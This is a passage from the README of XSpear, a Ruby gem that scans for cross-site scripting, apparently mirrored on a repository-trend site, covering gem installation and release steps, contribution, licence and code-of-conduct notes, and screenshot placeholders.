To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem` file to rubygems.org.

Contributing

Bug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.

Donate

I like coffee! I'm a coffee addict.
Buy Me A Coffee

License

The gem is available as open source under the terms of the MIT License.

Code of Conduct

Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.

ScreenShot

< Scanning Image> < CLI-Report 1 > < CLI-Report 2 > < JSON Report > < HTML Report >

Video

asciicast
πŸ”— More in this category

Β© 2026 GitRepoTrend Β· hahwul/XSpear Β· Updated daily from GitHub